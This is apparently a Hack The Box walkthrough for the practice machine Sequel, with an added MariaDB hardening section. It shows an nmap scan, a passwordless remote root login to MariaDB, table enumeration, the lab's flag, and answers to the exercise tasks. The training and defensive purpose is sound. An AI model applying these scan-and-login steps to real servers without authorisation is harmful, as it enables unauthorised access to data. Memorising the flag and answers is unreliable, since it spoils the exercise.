Hackthebox machine Sequel walkthrough
Target: Sequel
Difficulty: very easy
The author uses Kali Linux as the penetration-testing platform. On Kali Linux, first establish the VPN connection to the Hackthebox site with openvpn, then spawn a Sequel instance on the Hackthebox site (as shown in the figure below) to obtain the IP address of the target Sequel instance:
# openvpn starting_point_jasonhuawen.ovpn
Task 1: What does the acronym SQL stand for?
Answer: Structured Query Language
Task 2: During our scan, which port running mysql do we find?
Approach: scan the target with nmap to find the port the MySQL service is listening on.
# nmap -sS 10.129.95.232
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 08:40 EDT
Nmap scan report for 10.129.94.111
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
3306/tcp open  mysql
Answer: 3306
Task 3: What community-developed MySQL version is the target running?
Answer: MariaDB
Task 4: What switch do we need to use in order to specify a login username for the MySQL service?
Answer: -u
Task 5: Which username allows us to log into MariaDB without providing a password?
Approach: the hint is already obvious, so try logging into MariaDB directly as root; it turns out no password is required to enter the database.
Answer: root
# mysql -uroot -h 10.129.95.232
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 75
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
Task 6: What symbol can we use to specify within the query that we want to display everything inside a table?
Answer: *
Task 7: What symbol do we need to end each query with?
Answer: ;
The last task is retrieving the flag, which is fairly easy. Since we are already inside the database, first list the databases; htb stands out immediately. Then list the tables in that database and look at the rows of each table one by one, and the flag appears:
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.244 sec)

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.200 sec)

MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
+----+----------+------------------+
4 rows in set (0.759 sec)

MariaDB [htb]> select * from config
    -> ;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.206 sec)
Flag obtained successfully.
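The weakness that made this box trivial is a root account that accepts network logins without a password. The SQL below is an added example, not part of the original walkthrough: it audits a MariaDB 10.3 server (the version shown above) for such accounts and then applies the hardened configuration. The host patterns, the htb_app account name and the CHANGE-ME passwords are placeholders.

```sql
-- Audit (MariaDB 10.3): accounts with no stored credential, and root
-- accounts reachable from any host. On this box root logged in remotely
-- with no password, so at least one row is expected.
SELECT user, host, plugin, authentication_string
FROM mysql.user
WHERE (password = '' AND authentication_string = '')  -- nothing to authenticate against
   OR (user = 'root' AND host = '%');                 -- root reachable from the network

-- Fix 1 (minimum): give the remote root account a real password.
-- The '%' host is an assumption; use the host value the audit returned.
ALTER USER 'root'@'%' IDENTIFIED BY 'CHANGE-ME-strong-passphrase';

-- Fix 2 (preferred): drop the remote root account entirely and keep
-- administration on the local Unix socket, authenticated by the OS user.
DROP USER IF EXISTS 'root'@'%';
ALTER USER 'root'@'localhost' IDENTIFIED VIA unix_socket;

-- Applications get their own least-privilege account scoped to the htb
-- database and to the application subnet (placeholder 10.0.0.%).
CREATE USER IF NOT EXISTS 'htb_app'@'10.0.0.%' IDENTIFIED BY 'CHANGE-ME-app-password';
GRANT SELECT, INSERT, UPDATE ON htb.* TO 'htb_app'@'10.0.0.%';
FLUSH PRIVILEGES;

-- Re-run the audit: it should now return no rows.
SELECT user, host
FROM mysql.user
WHERE (password = '' AND authentication_string = '' AND plugin NOT IN ('unix_socket'))
   OR (user = 'root' AND host <> 'localhost');
```

If the database never needs to be reached from other hosts, also set bind-address to 127.0.0.1 in the server configuration so port 3306 is not exposed in the first place.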